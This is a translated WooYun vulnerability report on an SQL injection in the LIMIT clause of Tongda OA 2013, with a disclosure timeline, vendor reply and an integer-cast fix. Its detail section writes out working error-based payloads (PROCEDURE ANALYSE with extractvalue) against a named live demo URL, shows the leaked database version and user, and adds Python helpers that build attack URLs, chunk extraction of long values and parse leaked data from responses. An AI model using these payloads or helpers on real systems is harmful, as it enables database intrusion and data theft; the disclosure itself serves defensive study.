
Vulnerability summary

Defect ID: wooyun-2015-0103304

Title: Tongda OA 2013 Enterprise Edition, SQL injection requiring a technique (injection point in the LIMIT clause)

Vendor: 通达信科 (Tongda)

Author: 路人甲

Submitted: 2015-03-25 15:32

Fixed: 2015-06-24 10:50

Published: 2015-06-24 10:50

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-25: Details sent to the vendor, awaiting vendor handling
2015-03-26: Vendor confirmed; details visible to the vendor only
2015-03-29: Details opened to third-party security partners
2015-05-20: Details opened to core white hats and domain experts
2015-05-30: Details opened to regular white hats
2015-06-09: Details opened to intern white hats
2015-06-24: Details made public

Brief description:

Tongda again.

Detailed description:

Log in to the official demo site for testing:
http://www.day900.com
Injection point:
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
After appending a single quote:
Please contact the administrator
Error #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL statement: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15\'
File: /general/mytable/intel_view/workflow.php
The injection point is MAX_COUNT, but it sits in the LIMIT clause; several attempts failed.
Finally:
Payload: 15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
http://www.day900.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
The version is returned successfully:
Error #1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad'
SQL statement: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)
File: /general/mytable/intel_view/workflow.php
The same method returns the database user:
Error #1105: XPATH syntax error: ':[email protected]'
SQL statement: SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_RUN.FLOW_ID,PRCS_FLAG,FLOW_PRCS,FLOW_NAME,RUN_NAME,FLOW_TYPE,LIST_FLDS_STR,FORM_ID from FLOW_RUN_PRCS,FLOW_RUN,FLOW_TYPE WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID and FLOW_RUN.FLOW_ID=FLOW_TYPE.FLOW_ID and USER_ID='ghq' and DEL_FLAG='0' and PRCS_FLAG<>'1' and PRCS_FLAG<>'2' and PRCS_FLAG<>'3' and PRCS_FLAG<>'4' and PRCS_FLAG<>'5' and CHILD_RUN='0' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc limit 0,15 procedure analyse(extractvalue(rand(),concat(0x3a,user())),1)
File: /general/mytable/intel_view/workflow.php
[email protected]
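Why the LIMIT position is awkward, and how the PROCEDURE ANALYSE trick gets around it, as an added Python example that is not part of the original report and not Tongda's code. In MySQL's SELECT grammar the only things allowed after LIMIT are PROCEDURE, INTO, or a locking clause, so UNION and boolean payloads produce syntax errors there; PROCEDURE ANALYSE() still evaluates its arguments, and extractvalue() with an XPath beginning with ':' raises error 1105 whose message echoes the concatenated value (limited to 32 characters, which is why the version string above is cut at "-ad"). The query template, parameter names and sample response line below are constructed from what the report shows; build_query_vulnerable, build_query_hardened, limit_payload, chunked_exprs, attack_url and extract_leak are hypothetical helpers.

```python
import re
from urllib.parse import quote

# Constructed, shortened stand-in for the query in the report's error output:
# the application concatenates MAX_COUNT straight into the trailing LIMIT clause.
QUERY_TEMPLATE = (
    "SELECT FLOW_RUN_PRCS.PRCS_ID,FLOW_RUN.RUN_ID,FLOW_NAME "
    "from FLOW_RUN_PRCS,FLOW_RUN WHERE FLOW_RUN_PRCS.RUN_ID=FLOW_RUN.RUN_ID "
    "and USER_ID='ghq' order by FLOW_RUN_PRCS.PRCS_FLAG,PRCS_TIME desc "
    "limit 0,{max_count}"
)


def build_query_vulnerable(max_count: str) -> str:
    """Mirrors the flawed pattern: the raw parameter lands inside LIMIT."""
    return QUERY_TEMPLATE.format(max_count=max_count)


def build_query_hardened(max_count: str, upper: int = 200) -> str:
    """Fix: LIMIT only ever takes an integer literal, so cast and range-check.
    int() raises ValueError on 'procedure analyse(...)' and on a stray quote."""
    n = int(max_count)
    if not 0 < n <= upper:
        raise ValueError(f"MAX_COUNT out of range: {n}")
    return QUERY_TEMPLATE.format(max_count=n)


def limit_payload(expr: str, count: int = 15) -> str:
    """Error-based payload for an injection point after ORDER BY ... LIMIT.
    PROCEDURE ANALYSE() is grammatically valid after LIMIT and evaluates its
    arguments; extractvalue() with an XPath starting with ':' raises error
    1105 whose text contains the value we concatenated after the 0x3a marker."""
    return f"{count} procedure analyse(extractvalue(rand(),concat(0x3a,{expr})),1)"


def chunked_exprs(expr: str, total_len: int, width: int = 31) -> list:
    """The 1105 message shows at most 32 characters and the ':' marker uses
    one, so longer values are read 31 characters at a time with substr()."""
    return [f"substr({expr},{pos},{width})" for pos in range(1, total_len + 1, width)]


def attack_url(base: str, expr: str) -> str:
    """Builds the GET request as the report does: spaces become %20 while
    parentheses and commas stay unencoded (MySQL does not care either way)."""
    params = [("MAX_COUNT", limit_payload(expr)), ("TYPE", "3"),
              ("MODULE_SCROLL", "false"), ("MODULE_ID", "55")]
    return base + "?" + "&".join(f"{k}={quote(v, safe='(),')}" for k, v in params)


# Matches the MySQL #1105 message the application echoes into the page.
LEAK_RE = re.compile(r"XPATH syntax error: ':([^']*)'")


def extract_leak(body: str):
    """Pulls the leaked value out of a response body; None if no error shown."""
    m = LEAK_RE.search(body)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed response fragment, copied in shape from the report.
    sample = "Error #1105: XPATH syntax error: ':5.5.25-enterprise-commercial-ad'"
    print(attack_url("http://www.day900.com/general/mytable/intel_view/workflow.php", "version()"))
    print(extract_leak(sample))
    for e in chunked_exprs("version()", 37):
        print(limit_payload(e))
```

The hardened builder is the whole fix: once MAX_COUNT is cast to an integer before it reaches the LIMIT clause there is nothing left for the payload to attach to, and the same cast applies to any other numeric parameter the page interpolates.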

Proof of vulnerability:

See the detailed description.

Fix:

Filter the input: cast MAX_COUNT to an integer before it is used in the LIMIT clause.

Copyright: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2015-03-26 10:49

Vendor reply:

The 2013 edition has long been discontinued.

Latest status:

None